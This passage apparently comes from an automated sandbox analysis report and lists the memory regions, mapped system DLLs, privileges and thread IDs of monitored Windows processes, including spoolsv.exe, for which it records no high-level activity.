| private_0x000000f610420000 | 0xf610420000 | 0xf61051ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610520000 | 0xf610520000 | 0xf61061ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610620000 | 0xf610620000 | 0xf61071ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610720000 | 0xf610720000 | 0xf61081ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610820000 | 0xf610820000 | 0xf61091ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610920000 | 0xf610920000 | 0xf610a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610a20000 | 0xf610a20000 | 0xf610b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610b20000 | 0xf610b20000 | 0xf610c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610c20000 | 0xf610c20000 | 0xf610d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610d20000 | 0xf610d20000 | 0xf610e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f610e20000 | 0xf610e20000 | 0xf610e9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f610ea0000 | 0xf610ea0000 | 0xf610ea0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0xf610eb0000 | 0xf6111e6fff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6111f0000 | 0xf6111fffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611200000 | 0xf61120ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611210000 | 0xf61121ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611220000 | 0xf61122ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611230000 | 0xf61123ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611240000 | 0xf61124ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f6112f0000 | 0xf6112f0000 | 0xf6112f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611300000 | 0xf611300000 | 0xf611300fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611310000 | 0xf611310000 | 0xf611310fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611320000 | 0xf611320000 | 0xf611320fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611330000 | 0xf611330000 | 0xf611336fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f611340000 | 0xf611340000 | 0xf61134ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611350000 | 0xf611350000 | 0xf61135ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611360000 | 0xf611360000 | 0xf61136ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611370000 | 0xf611370000 | 0xf61137ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611380000 | 0xf611380000 | 0xf61138ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611390000 | 0xf611390000 | 0xf61139ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000f6113a0000 | 0xf6113a0000 | 0xf6113a0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f6113b0000 | 0xf6113b0000 | 0xf6113b0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f6113c0000 | 0xf6113c0000 | 0xf6113c3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f6113d0000 | 0xf6113d0000 | 0xf6113d1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f6113e0000 | 0xf6113e0000 | 0xf6113e0fff | Private Memory | rw |
|
|
|
- |
| vsstrace.dll.mui | 0xf6113f0000 | 0xf6113f8fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f611400000 | 0xf611400000 | 0xf6114fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611500000 | 0xf611500000 | 0xf611500fff | Private Memory | rw |
|
|
|
- |
| catdb | 0xf611510000 | 0xf61151ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611520000 | 0xf61152ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f611530000 | 0xf611530000 | 0xf611536fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000f611540000 | 0xf611540000 | 0xf61154ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611550000 | 0xf611550000 | 0xf61155ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611560000 | 0xf611560000 | 0xf61156ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611570000 | 0xf611570000 | 0xf61157ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611580000 | 0xf611580000 | 0xf61158ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000f611590000 | 0xf611590000 | 0xf61159ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| catdb | 0xf6115a0000 | 0xf6115affff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6115b0000 | 0xf6115bffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f6115c0000 | 0xf6115c0000 | 0xf6115c6fff | Private Memory | rw |
|
|
|
- |
| catdb | 0xf6115d0000 | 0xf6115dffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6115e0000 | 0xf6115effff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6115f0000 | 0xf6115fffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f611600000 | 0xf611600000 | 0xf6116fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611700000 | 0xf611700000 | 0xf6117c1fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f6117d0000 | 0xf6117d0000 | 0xf61184ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611850000 | 0xf611850000 | 0xf611856fff | Private Memory | rw |
|
|
|
- |
| catdb | 0xf611860000 | 0xf61186ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611870000 | 0xf61187ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611880000 | 0xf61188ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf611890000 | 0xf61189ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6118a0000 | 0xf6118affff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6118b0000 | 0xf6118bffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6118c0000 | 0xf6118cffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6118d0000 | 0xf6118dffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf6118e0000 | 0xf6118effff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f6118f0000 | 0xf6118f0000 | 0xf6118f0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611900000 | 0xf611900000 | 0xf6119fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611a00000 | 0xf611a00000 | 0xf611afffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611b00000 | 0xf611b00000 | 0xf611bfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611c00000 | 0xf611c00000 | 0xf611cfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611d00000 | 0xf611d00000 | 0xf611dfffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611e00000 | 0xf611e00000 | 0xf611efffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f611f00000 | 0xf611f00000 | 0xf611ffffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612000000 | 0xf612000000 | 0xf6120fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612100000 | 0xf612100000 | 0xf6121fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612200000 | 0xf612200000 | 0xf6122fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612300000 | 0xf612300000 | 0xf6123fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612400000 | 0xf612400000 | 0xf6124fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612500000 | 0xf612500000 | 0xf6125fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612600000 | 0xf612600000 | 0xf6126fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612700000 | 0xf612700000 | 0xf6127fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f612800000 | 0xf612800000 | 0xf6137fffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f613800000 | 0xf613800000 | 0xf613a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f613a10000 | 0xf613a10000 | 0xf623a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f623a10000 | 0xf623a10000 | 0xf633a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f633a10000 | 0xf633a10000 | 0xf633a8ffff | Private Memory | rw |
|
|
|
- |
| catdb | 0xf633a90000 | 0xf633a9ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf633aa0000 | 0xf633aaffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf633ab0000 | 0xf633abffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f633ac0000 | 0xf633ac0000 | 0xf643abffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f643ac0000 | 0xf643ac0000 | 0xf653abffff | Private Memory | rw |
|
|
|
- |
| private_0x000000f653ac0000 | 0xf653ac0000 | 0xf653ac0fff | Private Memory | rw |
|
|
|
- |
| catdb | 0xf653ad0000 | 0xf653adffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653ae0000 | 0xf653aeffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653af0000 | 0xf653afffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b00000 | 0xf653b0ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b10000 | 0xf653b1ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b20000 | 0xf653b2ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b30000 | 0xf653b3ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b40000 | 0xf653b4ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b50000 | 0xf653b5ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b60000 | 0xf653b6ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b70000 | 0xf653b7ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b80000 | 0xf653b8ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653b90000 | 0xf653b9ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653ba0000 | 0xf653baffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653bb0000 | 0xf653bbffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653bc0000 | 0xf653bcffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653bd0000 | 0xf653bdffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653be0000 | 0xf653beffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653bf0000 | 0xf653bfffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653c00000 | 0xf653c0ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653c10000 | 0xf653c1ffff | Memory Mapped File | r |
|
|
|
- |
| catdb | 0xf653c20000 | 0xf653c2ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5fffc0000 | 0x7df5fffc0000 | 0x7ff5fffbffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6e0bf8000 | 0x7ff6e0bf8000 | 0x7ff6e0bf9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfa000 | 0x7ff6e0bfa000 | 0x7ff6e0bfbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfc000 | 0x7ff6e0bfc000 | 0x7ff6e0bfdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0bfe000 | 0x7ff6e0bfe000 | 0x7ff6e0bfffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c00000 | 0x7ff6e0c00000 | 0x7ff6e0c01fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c02000 | 0x7ff6e0c02000 | 0x7ff6e0c03fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c04000 | 0x7ff6e0c04000 | 0x7ff6e0c05fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c06000 | 0x7ff6e0c06000 | 0x7ff6e0c07fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c08000 | 0x7ff6e0c08000 | 0x7ff6e0c09fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c0a000 | 0x7ff6e0c0a000 | 0x7ff6e0c0bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c0c000 | 0x7ff6e0c0c000 | 0x7ff6e0c0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c10000 | 0x7ff6e0c10000 | 0x7ff6e0c11fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c12000 | 0x7ff6e0c12000 | 0x7ff6e0c13fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6e0c14000 | 0x7ff6e0c14000 | 0x7ff6e0c15fff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 77 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #57: spoolsv.exe
0
0
| Information | Value |
|---|---|
| ID | #57 |
| File Name | c:\windows\system32\spoolsv.exe |
| Command Line | C:\Windows\System32\spoolsv.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x164 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeTcbPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege |
| Thread IDs |
0x
E18
0x
6D0
0x
CBC
0x
A94
0x
CB8
0x
CA0
0x
CAC
0x
530
0x
470
0x
404
0x
290
0x
234
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000110000 | 0x00110000 | 0x0011ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00126fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001c0000 | 0x0027dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| spoolsv.exe.mui | 0x002c0000 | 0x002c0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002f6fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00587fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00710fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000720000 | 0x00720000 | 0x007dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000820000 | 0x00820000 | 0x0085ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00860fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x00936fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000940000 | 0x00940000 | 0x0094ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000950000 | 0x00950000 | 0x00950fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00970000 | 0x00ca6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| localspl.dll.mui | 0x00db0000 | 0x00dc3fff | Memory Mapped File | r |
|
|
|
- |
| wsdmon.dll.mui | 0x00dd0000 | 0x00dd0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00de0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x00df0fff | Pagefile Backed Memory | r |
|
|
|
- |
| kernelbase.dll.mui | 0x00e00000 | 0x00edefff | Memory Mapped File | r |
|
|
|
- |
| msxml6r.dll | 0x00ee0000 | 0x00ee0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ef0000 | 0x00ef0000 | 0x00efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00ffffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001000000 | 0x01000000 | 0x01006fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001010000 | 0x01010000 | 0x0110ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001110000 | 0x01110000 | 0x0130ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0134ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001350000 | 0x01350000 | 0x0138ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013d0000 | 0x013d0000 | 0x0140ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001410000 | 0x01410000 | 0x0144ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001490000 | 0x01490000 | 0x014cffff | Private Memory | rw |
|
|
|
- |
| win32spl.dll.mui | 0x014d0000 | 0x014d0fff | Memory Mapped File | r |
|
|
|
- |
| inetpp.dll.mui | 0x014e0000 | 0x014e0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001530000 | 0x01530000 | 0x0156ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df5ffc90000 | 0x7df5ffc90000 | 0x7ff5ffc8ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7c7d5c000 | 0x7ff7c7d5c000 | 0x7ff7c7d5dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7d60000 | 0x7ff7c7d60000 | 0x7ff7c7d61fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7d64000 | 0x7ff7c7d64000 | 0x7ff7c7d65fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7d66000 | 0x7ff7c7d66000 | 0x7ff7c7d67fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7d6a000 | 0x7ff7c7d6a000 | 0x7ff7c7d6bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7d6c000 | 0x7ff7c7d6c000 | 0x7ff7c7d6dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7d6e000 | 0x7ff7c7d6e000 | 0x7ff7c7d6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7c7d70000 | 0x7ff7c7d70000 | 0x7ff7c7e6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7c7e70000 | 0x7ff7c7e70000 | 0x7ff7c7e92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7c7e95000 | 0x7ff7c7e95000 | 0x7ff7c7e96fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7e97000 | 0x7ff7c7e97000 | 0x7ff7c7e98fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7e99000 | 0x7ff7c7e99000 | 0x7ff7c7e99fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7e9a000 | 0x7ff7c7e9a000 | 0x7ff7c7e9bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7e9c000 | 0x7ff7c7e9c000 | 0x7ff7c7e9dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7c7e9e000 | 0x7ff7c7e9e000 | 0x7ff7c7e9ffff | Private Memory | rw |
|
|
|
- |
| spoolsv.exe | 0x7ff7c8010000 | 0x7ff7c80d4fff | Memory Mapped File | rwx |
|
|
|
- |
| win32spl.dll | 0x7ffc3ec70000 | 0x7ffc3ed41fff | Memory Mapped File | rwx |
|
|
|
- |
| drvstore.dll | 0x7ffc3ed50000 | 0x7ffc3ee22fff | Memory Mapped File | rwx |
|
|
|
- |
| webservices.dll | 0x7ffc3ee30000 | 0x7ffc3efaafff | Memory Mapped File | rwx |
|
|
|
- |
| wsdapi.dll | 0x7ffc3efb0000 | 0x7ffc3f056fff | Memory Mapped File | rwx |
|
|
|
- |
| wsdmon.dll | 0x7ffc3f060000 | 0x7ffc3f0f3fff | Memory Mapped File | rwx |
|
|
|
- |
| inetpp.dll | 0x7ffc40100000 | 0x7ffc4012dfff | Memory Mapped File | rwx |
|
|
|
- |
| usbmon.dll | 0x7ffc40130000 | 0x7ffc4017efff | Memory Mapped File | rwx |
|
|
|
- |
| localspl.dll | 0x7ffc402b0000 | 0x7ffc403c5fff | Memory Mapped File | rwx |
|
|
|
- |
| fundisc.dll | 0x7ffc40fd0000 | 0x7ffc40ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x7ffc41e90000 | 0x7ffc41f13fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7ffc44450000 | 0x7ffc446c6fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpmon.dll | 0x7ffc46700000 | 0x7ffc46739fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7ffc4a480000 | 0x7ffc4a491fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffc4b6e0000 | 0x7ffc4b6ebfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ffc4c270000 | 0x7ffc4c279fff | Memory Mapped File | rwx |
|
|
|
- |
| fdpnp.dll | 0x7ffc4ce50000 | 0x7ffc4ce62fff | Memory Mapped File | rwx |
|
|
|
- |
| wsnmp32.dll | 0x7ffc4cea0000 | 0x7ffc4ceb3fff | Memory Mapped File | rwx |
|
|
|
- |
| winprint.dll | 0x7ffc4cf80000 | 0x7ffc4cf8ffff | Memory Mapped File | rwx |
|
|
|
- |
| fxsmon.dll | 0x7ffc4cf90000 | 0x7ffc4cfa0fff | Memory Mapped File | rwx |
|
|
|
- |
| deviceassociation.dll | 0x7ffc4d060000 | 0x7ffc4d06ffff | Memory Mapped File | rwx |
|
|
|
- |
| printisolationproxy.dll | 0x7ffc4d0e0000 | 0x7ffc4d0f3fff | Memory Mapped File | rwx |
|
|
|
- |
| snmpapi.dll | 0x7ffc4d150000 | 0x7ffc4d15bfff | Memory Mapped File | rwx |
|
|
|
- |
| spoolss.dll | 0x7ffc4d340000 | 0x7ffc4d35bfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffc4d9d0000 | 0x7ffc4daa5fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffc4fb00000 | 0x7ffc4fb35fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffc50980000 | 0x7ffc509e7fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7ffc51840000 | 0x7ffc5185dfff | Memory Mapped File | rwx |
|
|
|
- |
| sfc_os.dll | 0x7ffc51a30000 | 0x7ffc51a40fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffc51c30000 | 0x7ffc51c3afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffc51c50000 | 0x7ffc51c87fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x7ffc51ca0000 | 0x7ffc51ca9fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffc52640000 | 0x7ffc52652fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffc52ef0000 | 0x7ffc52f16fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffc532b0000 | 0x7ffc532e1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffc532f0000 | 0x7ffc53371fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffc534a0000 | 0x7ffc534c2fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffc53720000 | 0x7ffc53777fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffc53830000 | 0x7ffc5383bfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffc53840000 | 0x7ffc53865fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffc53a90000 | 0x7ffc53ac2fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffc53b80000 | 0x7ffc53b9efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffc53be0000 | 0x7ffc53c87fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffc53dd0000 | 0x7ffc53e2cfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffc54210000 | 0x7ffc54226fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffc54280000 | 0x7ffc5428afff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffc54320000 | 0x7ffc5434bfff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffc543a0000 | 0x7ffc543c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffc543d0000 | 0x7ffc5443afff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffc545f0000 | 0x7ffc54600fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffc54620000 | 0x7ffc54663fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffc54ca0000 | 0x7ffc54cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffc54db0000 | 0x7ffc54f70fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7ffc55630000 | 0x7ffc557f4fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffc55910000 | 0x7ffc559cdfff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffc56f00000 | 0x7ffc56f07fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffc57750000 | 0x7ffc57890fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
